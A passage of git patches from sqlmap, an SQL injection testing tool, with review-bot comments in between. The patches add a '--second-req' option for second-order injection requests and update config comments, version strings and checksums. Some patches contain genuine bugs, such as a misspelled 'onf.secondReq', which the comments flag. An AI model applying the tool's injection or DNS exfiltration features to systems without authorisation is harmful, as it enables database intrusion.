@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dd2c8c71982173660be8b77f2af0fc3e lib/core/settings.py +9c986c5efbfe712c434b9372e8572a8d lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -59,7 +59,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -dc7b8fef4125abb26869689b8921b195 lib/parse/cmdline.py +d6ac9df0bafd0ee171380a7b0581f6d2 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -70,7 +70,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -8500dfaccd8ac4a6eecbca266f6327c9 lib/request/connect.py +60c9d366d0f2173d8dc9f504a7e9d374 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 099110bc1f726d930da7aaf10d454bde46fb230d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:14:44 +0200 Subject: [PATCH 174/428] Minor commit regarding #739 --- lib/core/common.py | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8b1192d94e8..f3af4bee243 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -4102,6 +4102,7 @@ def checkDeprecatedOptions(args): """ for _ in args: + _ = _.split('=')[0].strip() if _ in DEPRECATED_OPTIONS: errMsg = "switch/option '%s' is deprecated" % _ if DEPRECATED_OPTIONS[_]: diff --git a/lib/core/settings.py b/lib/core/settings.py index 83d74d3bc2f..6f7c876eb27 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.23" +VERSION = "1.2.6.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a96a1bd2882..282acd53a22 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -e57bda5d5e3011b4e2d8e0a21f546e77 lib/core/common.py +cfd0b24b7da8dd85cd29360e9c6fb56a lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9c986c5efbfe712c434b9372e8572a8d lib/core/settings.py +b78d172e50095c1d6612ed52b4c79a6b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From ccda26a567e6e748cbc7bc1c0e2ca7ddc5c94aba Mon Sep 17 00:00:00 2001 
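Review bot: The added `_ = _.split('=')[0].strip()` rebinds the loop variable `_`, which by convention marks a throwaway value, so the lookup `if _ in DEPRECATED_OPTIONS` and the message `"switch/option '%s' is deprecated" % _` now read as if they act on an ignored value; `for arg in args:` with `name = arg.split('=')[0].strip()` and `name` in both the lookup and the message makes the intent explicit. The split is what makes `--second-order=foo` match in addition to `--second-order foo`, which deserves a one-line comment such as `# strip an inline '=value' so '--opt=value' is recognised as well`. `checkDeprecatedOptions` starts above the hunk.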
From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:23:17 +0200 Subject: [PATCH 175/428] Minor commit regarding #739 --- lib/core/optiondict.py | 1 + lib/core/settings.py | 2 +- lib/parse/cmdline.py | 3 +++ lib/request/connect.py | 2 ++ sqlmap.conf | 14 +++++++++----- txt/checksum.md5 | 8 ++++---- 6 files changed, 20 insertions(+), 10 deletions(-) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 56f1529f298..54d781c4dea 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -110,6 +110,7 @@ "uFrom": "string", "dnsDomain": "string", "secondUrl": "string", + "secondReq": "string", }, "Fingerprint": { diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f7c876eb27..ec1744eac09 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.24" +VERSION = "1.2.6.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index ab6b2f8e16e..dcbf3d876a5 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -336,6 +336,9 @@ def cmdLineParser(argv=None): techniques.add_option("--second-url", dest="secondUrl", help="Resulting page URL searched for second-order response") + techniques.add_option("--second-req", dest="secondReq", + help="Load second-order HTTP request from file") + # Fingerprint options fingerprint = OptionGroup(parser, "Fingerprint") diff --git a/lib/request/connect.py b/lib/request/connect.py index 50f287bee13..a4300d0a44f 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -1237,6 +1237,8 @@ def _randomizeParameter(paramString, randomParameter): if conf.secondUrl: page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + elif conf.secondReq: + pass threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/sqlmap.conf b/sqlmap.conf index e0c9eda0010..3d70d3383d0 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -367,29 +367,33 @@ tech = BEUSTQ # Default: 5 timeSec = 5 -# Range of columns to test for +# Range of columns to test for. # Valid: range of integers # Example: 1-10 uCols = -# Character to use for bruteforcing number of columns +# Character to use for bruteforcing number of columns. # Valid: string # Example: NULL uChar = -# Table to use in FROM part of UNION query SQL injection +# Table to use in FROM part of UNION query SQL injection. # Valid: string # Example: INFORMATION_SCHEMA.COLLATIONS uFrom = -# Domain name used for DNS exfiltration attack +# Domain name used for DNS exfiltration attack. # Valid: string dnsDomain = -# Resulting page URL searched for second-order response +# Resulting page URL searched for second-order response. # Valid: string secondUrl = +# Load second-order HTTP request from file. +# Valid: string +secondReq = + [Fingerprint] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 282acd53a22..187f76e69d2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -40,7 +40,7 @@ bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py
 cada93357a7321655927fc9625b3bfec lib/core/exception.py
 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py
 458a194764805cd8312c14ecd4be4d1e lib/core/log.py
-262b62d685a2403586e6ca0aac2e41d8 lib/core/optiondict.py
+e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py
 90a061be1a0658c2bdb197511b61d6fa lib/core/option.py
 c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-b78d172e50095c1d6612ed52b4c79a6b lib/core/settings.py
+dc0d040df74bdf0d6a08f41d412b76e7 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py
@@ -59,7 +59,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
 e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py
 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py
 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py
-d6ac9df0bafd0ee171380a7b0581f6d2 lib/parse/cmdline.py
+2b3b021a8e7e119d0553c02b110d07d9 lib/parse/cmdline.py
 fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py
 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py
@@ -70,7 +70,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -60c9d366d0f2173d8dc9f504a7e9d374 lib/request/connect.py +607419fd07bcabc274782dbc7b238e8b lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From f1254fef4b46832270e2648d41a8f2c59402c0e9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:39:10 +0200 Subject: [PATCH 176/428] Finalizes implementation for #739 --- lib/core/common.py | 2 +- lib/core/option.py | 42 +++++++++++++++++++++++++++--------------- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 8 ++++---- 5 files changed, 35 insertions(+), 23 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index f3af4bee243..afa82648463 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4504,7 +4504,7 @@ def _parseWebScarabLog(content): continue if not(conf.scope and not re.search(conf.scope, url, re.I)): - yield (url, method, None, cookie, None) + yield (url, method, None, cookie, tuple()) def _parseBurpLog(content): """ diff --git a/lib/core/option.py b/lib/core/option.py index bca5974f3e9..17dd6ab647a 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
@@ -285,26 +285,37 @@ def _setRequestFromFile(): textual file, parses it and saves the information into the knowledge base. """ - if not conf.requestFile: - return + if conf.requestFile: + conf.requestFile = safeExpandUser(conf.requestFile) + seen = set() - seen = set() + if not os.path.isfile(conf.requestFile): + errMsg = "specified HTTP request file '%s' " % conf.requestFile + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) - conf.requestFile = safeExpandUser(conf.requestFile) + infoMsg = "parsing HTTP request from '%s'" % conf.requestFile + logger.info(infoMsg) - if not os.path.isfile(conf.requestFile): - errMsg = "specified HTTP request file '%s' " % conf.requestFile - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) + for target in parseRequestFile(conf.requestFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) + if conf.secondReq: + conf.secondReq = safeExpandUser(conf.secondReq) + + if not os.path.isfile(conf.secondReq): + errMsg = "specified second-order HTTP request file '%s' " % onf.secondReq + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) + + infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq + logger.info(infoMsg) - for target in parseRequestFile(conf.requestFile): - url = target[0] - if url not in seen: - kb.targets.add(target) - seen.add(url) + target = parseRequestFile(conf.secondReq).next() + kb.secondReq = target def _setCrawler(): if not conf.crawlDepth: @@ -1823,6 +1834,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.rowXmlMode = False kb.safeCharEncode = False kb.safeReq = AttribDict() + kb.secondReq = None kb.singleLogFlags = set() kb.skipSeqMatcher = False kb.reduceTests = None diff --git a/lib/core/settings.py b/lib/core/settings.py index ec1744eac09..dfc4e9b4e46 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
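Review bot: The error path for a missing second-order file references `onf.secondReq` instead of `conf.secondReq`, so a wrong `--second-req` path dies with NameError rather than the intended SqlmapFilePathException. One line further, `parseRequestFile(conf.secondReq).next()` raises a bare StopIteration when the file holds no usable request — including the case where the second-order URL does not match `conf.scope`, which `parseRequestFile` applies to every target it yields — and that propagates out of option parsing as an unexplained traceback. Both should become the project's own exceptions, as below; `SqlmapGenericException` carried the same message in the removed `_feedTargetsDict`, so it is presumably still imported in this module. `_setRequestFromFile` starts above the hunk.
```python
        if not os.path.isfile(conf.secondReq):
            errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq
            errMsg += "does not exist"
            raise SqlmapFilePathException(errMsg)

        # … unchanged: info message …

        try:
            kb.secondReq = parseRequestFile(conf.secondReq).next()
        except StopIteration:
            errMsg = "unable to find usable request in "
            errMsg += "provided second-order file ('%s')" % conf.secondReq
            raise SqlmapGenericException(errMsg)
```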
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.25" +VERSION = "1.2.6.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index a4300d0a44f..dcfd675a8fc 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1237,8 +1237,8 @@ def _randomizeParameter(paramString, randomParameter): if conf.secondUrl: page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) - elif conf.secondReq: - pass + elif kb.secondReq: + page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 187f76e69d2..afad8a4f388 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -cfd0b24b7da8dd85cd29360e9c6fb56a lib/core/common.py +eb9e08ba86bfcf7d97454357d9838531 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
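Review bot: The new `kb.secondReq` branch builds its header set with `dict(auxHeaders, **dict(kb.secondReq[4]))`, which raises TypeError when `auxHeaders` is None; the sibling `conf.secondUrl` branch passes `auxHeaders` through unchanged, which suggests None can reach this point, so guard it with `auxHeaders=dict(auxHeaders or {}, **dict(kb.secondReq[4]))`. Note also that this branch sends the cookie captured in the request file (`cookie=kb.secondReq[3]`) where the `--second-url` branch sends the live `cookie`, so a session cookie obtained during testing is not carried to the second-order request; if that is intended, a one-line comment saying so would save the next reader a detour. The enclosing function begins and ends outside the hunk.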
@@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py -90a061be1a0658c2bdb197511b61d6fa lib/core/option.py +ee8a51cb09bbbe50984a4588a4f29043 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dc0d040df74bdf0d6a08f41d412b76e7 lib/core/settings.py +12db3bd1245ed6e89910c61e736b1f6b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -70,7 +70,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -607419fd07bcabc274782dbc7b238e8b lib/request/connect.py +1b5491cc079384f08cbc6b397786e1af lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 8f4488d608a8836c5ecbbdf67129bc5e5746c503 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 00:08:55 +0200 Subject: [PATCH 177/428] Minor patches related to the #739 --- lib/core/common.py | 4 ++-- lib/core/option.py | 6 +++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 11 insertions(+), 7 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index afa82648463..32e07e0fd3b 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -4475,7 +4475,7 @@ def pollProcess(process, suppress_errors=False): break -def parseRequestFile(reqFile): +def parseRequestFile(reqFile, checkParams=True): """ Parses WebScarab and Burp logs and adds results to the target URL list """ @@ -4624,7 +4624,7 @@ def _parseBurpLog(content): data = data.rstrip("\r\n") if data else data - if getPostReq and (params or cookie): + if getPostReq and (params or cookie or not checkParams): if not port and isinstance(scheme, basestring) and scheme.lower() == "https": port = "443" elif not scheme and port == "443": diff --git a/lib/core/option.py b/lib/core/option.py index 17dd6ab647a..f9151e05c00 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -314,7 +314,7 @@ def _setRequestFromFile(): infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq logger.info(infoMsg) - target = parseRequestFile(conf.secondReq).next() + target = parseRequestFile(conf.secondReq, False).next() kb.secondReq = target def _setCrawler(): @@ -2224,6 +2224,10 @@ def _basicOptionValidation(): errMsg = "switch '--eta' is incompatible with option '-v'" raise SqlmapSyntaxException(errMsg) + if conf.secondUrl and conf.secondReq: + errMsg = "option '--second-url' is incompatible with option '--second-req')" + raise SqlmapSyntaxException(errMsg) + if conf.direct and conf.url: errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index dfc4e9b4e46..35c0b73c568 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.26" +VERSION = "1.2.6.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
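Review bot: The new `checkParams` parameter of `parseRequestFile` is not documented; the docstring still only names the supported log formats. Extend it with a line such as `checkParams -- when False, requests carrying neither parameters nor a cookie are yielded too (used for the --second-req file)`, and, since the visible change applies the flag only in the Burp branch, state whether the WebScarab parser ignores it. The function body continues outside the hunk.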
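Review bot: `parseRequestFile(conf.secondReq, False)` passes the new flag positionally, which hides what `False` means at the call site; prefer `target = parseRequestFile(conf.secondReq, checkParams=False).next()`. Even with the flag relaxed, `.next()` still raises a bare StopIteration when the file yields no request at all (an unparseable file), so `next(..., None)` plus an explicit check and error message would turn that traceback into a user-facing error. `_setRequestFromFile` begins and ends outside the hunk.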
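Review bot: The new incompatibility message carries an unbalanced closing parenthesis, `errMsg = "option '--second-url' is incompatible with option '--second-req')"`, which will be printed verbatim to the user; drop the trailing `)` to match the neighbouring messages, `errMsg = "option '--second-url' is incompatible with option '--second-req'"`. `_basicOptionValidation` begins and ends outside the hunk.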
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index afad8a4f388..d6e992f8eb8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -eb9e08ba86bfcf7d97454357d9838531 lib/core/common.py +fee729e63aab1519fe485af45f4fb1ea lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py -ee8a51cb09bbbe50984a4588a4f29043 lib/core/option.py +d2672b24ffa985523066613138fccbbd lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -12db3bd1245ed6e89910c61e736b1f6b lib/core/settings.py +e9356ecbc79a58112311c4626c0e1c2d lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 2b55ae3e2ab8c79800cec88ed431783b50e02438 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 13:06:56 +0200 Subject: [PATCH 178/428] Minor just in case update --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 32e07e0fd3b..36f10c25f93 100644 
--- a/lib/core/common.py +++ b/lib/core/common.py @@ -1031,7 +1031,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): logger.debug(debugMsg) if retVal is None: - if checkBatch and conf.get("batch"): + if checkBatch and conf.get("batch") or conf.get("api"): if isListLike(default): options = ','.join(getUnicode(opt, UNICODE_ENCODING) for opt in default) elif default: diff --git a/lib/core/settings.py b/lib/core/settings.py index 35c0b73c568..e3feaf6e55f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.27" +VERSION = "1.2.6.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d6e992f8eb8..71f30de8d26 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -fee729e63aab1519fe485af45f4fb1ea lib/core/common.py +e9ea20ebda48080ff80f4b87b0085e6c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
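Review bot: `if checkBatch and conf.get("batch") or conf.get("api"):` relies on `and` binding tighter than `or`, so `checkBatch` no longer gates the API case: a caller passing `checkBatch=False` now silently gets the default whenever `conf.api` is set. If that is the intent (the API server has no interactive stdin to prompt on), make it explicit, `if (checkBatch and conf.get("batch")) or conf.get("api"):  # API mode can never prompt`; if not, it should read `if checkBatch and (conf.get("batch") or conf.get("api")):`. `readInput` begins and ends outside the hunk.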
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e9356ecbc79a58112311c4626c0e1c2d lib/core/settings.py +eceda1743cad3fb421344c19ab4148ed lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From e5968cae3119062371f664cdc573da5a6b368939 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 13:51:03 +0200 Subject: [PATCH 179/428] Fixes --profile --- lib/core/profiling.py | 29 +++++++++++++++++------------ lib/core/settings.py | 2 +- sqlmap.py | 28 +++++++++++++++------------- txt/checksum.md5 | 6 +++--- 4 files changed, 36 insertions(+), 29 deletions(-) diff --git a/lib/core/profiling.py b/lib/core/profiling.py index c1bd8acd57b..ec04b59c0ae 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py 
@@ -80,15 +80,20 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): if isinstance(pydotGraph, list): pydotGraph = pydotGraph[0] - pydotGraph.write_png(imageOutputFile) - - infoMsg = "displaying interactive graph with xdot library" - logger.info(infoMsg) - - # Display interactive Graphviz dot file by using extra/xdot/xdot.py - # http://code.google.com/p/jrfonseca/wiki/XDot - win = xdot.DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter("dot") - win.open_file(dotOutputFile) - gtk.main() + try: + pydotGraph.write_png(imageOutputFile) + except OSError: + errMsg = "profiling requires graphviz installed " + errMsg += "(Hint: 'sudo apt-get install graphviz')" + logger.error(errMsg) + else: + infoMsg = "displaying interactive graph with xdot library" + logger.info(infoMsg) + + # Display interactive Graphviz dot file by using extra/xdot/xdot.py + # http://code.google.com/p/jrfonseca/wiki/XDot + win = xdot.DotWindow() + win.connect('destroy', gtk.main_quit) + win.set_filter("dot") + win.open_file(dotOutputFile) + gtk.main() diff --git a/lib/core/settings.py b/lib/core/settings.py index e3feaf6e55f..7003b500f01 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.28" +VERSION = "1.2.6.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 75272136ead..62d850da396 100755 --- a/sqlmap.py +++ b/sqlmap.py 
